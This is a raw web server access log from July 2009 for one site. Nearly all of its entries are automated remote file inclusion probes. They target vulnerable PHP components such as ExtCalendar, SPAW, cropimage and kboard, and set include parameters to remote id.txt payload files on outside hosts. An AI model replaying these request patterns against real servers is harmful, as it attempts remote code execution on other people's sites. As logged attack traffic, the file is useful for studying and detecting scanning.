121.165.73.157 - - [01/Jul/2009:02:07:09 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
195.207.160.102 - - [01/Jul/2009:02:09:52 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:02:09:52 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:02:09:52 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:02:10:47 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:02:10:47 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:02:10:47 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.165.73.157 - - [01/Jul/2009:02:12:25 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
213.238.52.141 - - [01/Jul/2009:02:15:01 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.238.52.141 - - [01/Jul/2009:02:15:01 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.238.52.141 - - [01/Jul/2009:02:15:01 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.208.48 - - [01/Jul/2009:02:15:25 -0700] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
213.238.52.141 - - [01/Jul/2009:02:16:10 -0700] "GET /logs/access_090401.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.238.52.141 - - [01/Jul/2009:02:16:10 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.238.52.141 - - [01/Jul/2009:02:16:10 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.251.217.4 - - [01/Jul/2009:02:18:29 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.251.217.4 - - [01/Jul/2009:02:18:34 -0700] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.251.217.4 - - [01/Jul/2009:02:25:19 -0700] "GET /logs/access_090301.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.181.243.113 - - [01/Jul/2009:02:25:48 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://mexxs.net/images/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:02:25:48 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://mexxs.net/images/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.wirama.com"
121.165.73.157 - - [01/Jul/2009:02:27:52 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.165.73.157 - - [01/Jul/2009:02:27:52 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.165.73.157 - - [01/Jul/2009:02:29:19 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
121.165.73.157 - - [01/Jul/2009:02:29:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
121.165.73.157 - - [01/Jul/2009:02:31:28 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
60.50.11.66 - - [01/Jul/2009:02:58:05 -0700] "GET /logs/access_090331.log//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
60.50.11.66 - - [01/Jul/2009:02:58:05 -0700] "GET /skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
60.50.11.66 - - [01/Jul/2009:02:58:05 -0700] "GET /logs//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:23:48 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:23:48 -0700] "GET /logs/access_090601.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:23:48 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:24:03 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:24:03 -0700] "GET /logs/access_090601.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:24:04 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:02 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:02 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:05 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:05 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:05 -0700] "GET /logs/access_090601.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:10 -0700] "GET /logs/access_090601.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.232.105.116 - - [01/Jul/2009:03:28:26 -0700] "GET /logs/access_090601.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:03:28:54 -0700] "GET /logs/access_090531.log/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:03:28:54 -0700] "GET /errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:03:28:54 -0700] "GET /logs/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:31:58 -0700] "GET /errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:32:04 -0700] "GET /logs/access_090531.log/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:32:04 -0700] "GET /logs/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:34:11 -0700] "GET /logs/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:34:12 -0700] "GET /logs/access_090531.log/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:34:12 -0700] "GET /errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:36:30 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
114.200.199.144 - - [01/Jul/2009:03:36:30 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
114.200.199.144 - - [01/Jul/2009:03:36:30 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.172.22.2 - - [01/Jul/2009:03:37:59 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:38:01 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:38:10 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:38:10 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:38:10 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:38:10 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
114.200.199.144 - - [01/Jul/2009:03:38:22 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
114.200.199.144 - - [01/Jul/2009:03:38:22 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
114.200.199.144 - - [01/Jul/2009:03:38:22 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
66.172.22.2 - - [01/Jul/2009:03:39:01 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:39:01 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:39:01 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:39:06 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:39:06 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:03:39:06 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:45:20 -0700] "GET /errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:45:22 -0700] "GET /logs/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:45:29 -0700] "GET /logs/access_090531.log%20%20/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:03:45:30 -0700] "GET /logs/access_090531.log%20%20/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.181.243.113 - - [01/Jul/2009:03:49:54 -0700] "GET /logs/access_090531.log%20%20/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.151.224.247 - - [01/Jul/2009:03:53:25 -0700] "GET /logs/access_090601.log/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.151.224.247 - - [01/Jul/2009:03:53:25 -0700] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.151.224.247 - - [01/Jul/2009:03:53:25 -0700] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.222 - - [01/Jul/2009:04:02:08 -0700] "GET /logs/access_090601.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.222 - - [01/Jul/2009:04:02:08 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.222 - - [01/Jul/2009:04:02:11 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.94.56.39 - - [01/Jul/2009:04:06:09 -0700] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.94.56.39 - - [01/Jul/2009:04:06:09 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.94.56.39 - - [01/Jul/2009:04:06:09 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
199.120.90.222 - - [01/Jul/2009:04:08:56 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.222 - - [01/Jul/2009:04:09:05 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.222 - - [01/Jul/2009:04:09:06 -0700] "GET /logs/access_090601.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
199.120.90.222 - - [01/Jul/2009:04:09:43 -0700] "GET /logs/access_090301.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Jul/2009:04:17:56 -0700] "GET /logs/access_090531.log%20%20/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:04:17:59 -0700] "GET /logs/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:18:31 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:18:33 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:04 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:04 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:08 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:09 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:53 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:53 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:53 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:54 -0700] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:54 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.172.22.2 - - [01/Jul/2009:04:19:54 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:04:20:54 -0700] "GET /components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:04:21:03 -0700] "GET /logs/access_090330.log//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:04:21:03 -0700] "GET /logs//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.98.222.18 - - [01/Jul/2009:04:22:12 -0700] "GET /logs/access_090331.log//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.207.160.102 - - [01/Jul/2009:04:24:01 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Jul/2009:04:24:01 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Jul/2009:04:24:01 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Jul/2009:04:24:12 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:04:27:37 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:04:27:37 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:04:27:37 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Jul/2009:04:28:09 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Jul/2009:04:28:09 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Jul/2009:04:28:09 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
